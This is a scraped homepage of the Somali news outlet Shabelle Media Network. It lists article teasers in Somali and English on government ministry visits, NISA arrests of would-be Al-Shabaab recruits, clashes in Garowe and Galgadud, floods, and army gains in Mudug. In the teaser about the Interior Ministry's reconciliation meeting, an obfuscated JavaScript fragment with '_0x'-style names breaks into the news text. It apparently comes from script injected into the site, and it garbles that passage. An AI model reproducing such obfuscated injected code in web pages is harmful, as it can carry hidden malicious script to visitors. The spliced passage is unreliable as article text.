Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

R/W Xamza oo kormeer ku tegay saaradda Howlaha Guud iyo Guriyeynta

MUQDISHO (SMN) -  Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre, ayaa kormeer ku tagay Wasaaradda Howlaha Guud iyo Guriyeynta, si uu ugu kuurgalo hambsami u socodka howlaha ay Qaranka u hayaan.   Ra’iisul Wasaaraha ayaa mid mid u kormeeray qeybaha kala duwan ee Wasaaradda, isaga oo ka dhageystay masuuliyiinta Wasaaradda warbixinno la xiriira adeegyada ay Wasaaraddu siiso bulshada...

NISA oo gacanta ku dhigtay xubno doonayay inay ku biiraan Al-Shabaab

AFGOOYE (SMN) - Ha’yadda Sirdoonka iyo Nabad Suggida Qaranka ee NISA ayaa gacanta kusoo dhigtay 28 xubnood oo 25 ka mid ah ay doonayeen in ay ku biiraan Al-Shabaab.   Xubnahan oo watay Gaari nuuca loo yaqaano Caasi kana soo baxay deegaan Hoos taga degmada Afgooye ayaa gcanta Ciidanka Sirdoonka iyo Nabad Sugidda Qaranka soo galay xilli ay doonayeen in ay...

Ra’iisul wasaare ku xigeenka XFS oo boggaadiyay doorka haweenka ee Nabadda

MUQDISHO (SMN) - Ra’iisul Wasaare Ku Xigeenka Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Saalax Axmed Jaamac, ayaa sheegay in doorka ay haweenka Soomaaliyeed ka qaataan nabadda uu yahay mid soo jireen ah, isla markaana laf-dhabar u ahaa dowlad dhiska Soomaaliya.   Ra’iisul Wasaare Ku Xigeenka oo ka hadlayay munaasabadda maalinta Haweenka ee Nabadda iyo Amniga, ayaa sheegay in haweenku ay qayb weyn...

Faahfaahino kasoo baxaya dagaal ka dhacay magaalada Garoowe + Khasaaraha

GAROOWE (SMN) - Warar kala duwan ayaa ka soo baxaya khasaaraha ka dhashay dagaal culus oo maanta ka dhacay magaalada Garoowe ee xarunta maamulka Puntland, kaas oo dhaliyay khasaare kala duwan oo isugu jiro dhimasho iyo dhaawac.   Dagaalka ayaa u dhexeeyay ciidamo ka tirsan kuwa ammaanka Puntland iyo ciidamo kale oo taabacsan xubnaha mucaaradka ee ku sugan magaaladaasi. Wararka ayaa sheegaya...

Wasaaradda Arrimaha gudaha oo Muqdisho ka furtay shir muhiim ah

MUQDISHO (SMN) - Wasaaradda Arrimaha Gudaha, Federaalka iyo Dib-u-heshiisiinta XFS ayaa Magaalada Muqdisho ku daahfurtay Kulanka Dhamaystirka Hannaanka Dhab-u-heshiinta Qaran oo socon doona muddo Seddex Cisho ah.   Kulankaan oo ay qayb ka yihiin khubaro Soomaliyeed ayaa waxaa si rasmi ah u daahfuray Agaasimaha Guud ee Wasaaradda Arrimaha Gudaha, Federaalka iyo Dib-u-heshiisiinta XFS Mudan Cayduruus Macallin. function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function...

At least two dead, several injured in central Somalia fighting

GURI'EL, Somalia - A heavy battle caused damage last night in the Guri'el district of the Galgadud region, central Somalia on Monday night.   The local residents said the skirmish was between the Galmudug state police force and armed militias, who have an influence in the area previously controlled by the Sufi sect. The fighting came after the armed militias attacked the...

Reassessing Somalia’s Progress “Beyond Implementation Challenges in Governance and Security”

Former Petroleum Minister Mohamed Mukhar authored an opinion piece that appears to undervalue the strides Somalia has taken in its post-conflict recovery. The article presents a critical perspective on Somalia's challenges with implementing agreements, policies, laws, and international conventions since the establishment of its federal government institutions in 2012. To present facts accurately, it is important to acknowledge different perspectives...

At least 40 people dead in Kenya and Somalia flash floods

NAIROBI, Kenya — Heavy rains and flash flooding have killed at least 40 people and displaced tens of thousands in Kenya and Somalia, aid agencies reported Monday.   In Somalia, the government declared an emergency after the extreme weather killed at least 25 people and destroyed homes, roads and bridges. Emergency and rescue workers were trying to reach an estimated 2,400 residents...

Somali army recaptures key areas in Galmudug state from Al-Shabaab

MOGADISHU, Somalia - The Somali government said its army captured a major al-Shabab base in central Somalia, marking a significant victory in its military offensive against the al-Qaida linked group.   The SNA backed by local clan militia and Galmudug forces has taken over Baraga Mohamed Da'ud, 16 KM from Dabagalo area in the Mudug region. The operation led to the liberation...

Ciidamada dowladda oo la wareegay deegaan ku yaalla Mudug + Sawirro

DHUUSANAREEB (SMN) - Ciidanka Xoogga Dalka Soomaaliyeed, Qaybta 21-aad oo gacan ka helaya dadka deegaanka iyo Daraawiishta Galmudug ayaa saacadihii lasoo dhaafay la wareegay deegaanka Baraag Maxamed Daa'uud oo 16 KM u jira deegaanka Dabagalo ee Gobolka Mudug.   Howlgalkaan waxaa horkacaayey Taliyaha Qaybta 21-aad Gaashaanle Sare Cabdi Salaad, Taliyihii hore ee Qaybta General Xasan Jaamici, waxaana ciidamada ay baritaano ka...

WARAR KALE

Somalia: Labour Ministry Director General Implicated in Corruption Scandal as Calls for Accountability Grow

Officials of the Federal Government of Somalia have raised grave concerns about misgovernance and the maladministration of certain donor-funded activities at Somalia’s Ministry of...

Wasiir Cali Balcad oo ka jawaabay warbixin sheegtay in Al-Shabaab guulo waaweyn gaartay

Muqdisho – Wasiiru-dowlaha Wasaaradda Arrimaha Dibadda Soomaaliya, Cali Balcad, ayaa si adag uga horyimid warbixin cusub oo ay soo saartay International Crisis Group (ICG),...

Somalia condemns deadly Damascus cafe bombing, backs Syria

MOGADISHU, July 4 — Somalia on Saturday strongly condemned a deadly attack targeting a cafe in the Syrian capital Damascus, expressing solidarity with Syria...